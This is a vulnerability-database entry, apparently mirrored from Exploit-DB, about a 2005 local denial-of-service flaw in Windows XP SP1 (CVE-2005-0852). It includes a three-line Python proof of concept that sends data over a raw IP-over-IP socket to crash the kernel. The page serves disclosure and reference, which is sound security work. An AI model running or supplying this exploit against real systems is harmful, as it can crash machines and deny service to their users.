Lucene search
+L

Microsoft Windows XP - Local Denial of Service

🗓️ 22 Mar 2005 00:00:00Reported by [email protected]Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 40 Views

Microsoft Windows XP - Local Denial of Service vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2005-0852
24 Mar 200505:00
cve
cvelist
Cvelist
CVE-2005-0852
24 Mar 200505:00
cvelist
euvd
EUVD
EUVD-2005-0853
7 Oct 202500:30
euvd
nvd
NVD
CVE-2005-0852
2 May 200504:00
nvd
redhatcve
RedhatCVE
CVE-2005-0852
21 May 202521:59
redhatcve
source: https://www.securityfocus.com/bid/12870/info

It is reported that Microsoft Windows XP Service Pack 1 is prone to a local denial of service vulnerability.

The issue is reported to manifest when a raw IP over IP socket is created and data is transferred over the newly created socket.

It is reported that this operation causes the kernel of the Windows computer to crash, resulting in the computer rebooting. If this issue can be triggered reliably, a local attacker may exploit the issue to deny service for legitimate users.

Further investigation into this issue is ongoing; this BID will be updated as soon as more details are available.

import socket
s=socket.socket(socket.AF_INET,socket.SOCK_RAW,4)
s.sendto("",("x.x.x.x",0))

Press ENTER and your win box should crash immediately.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation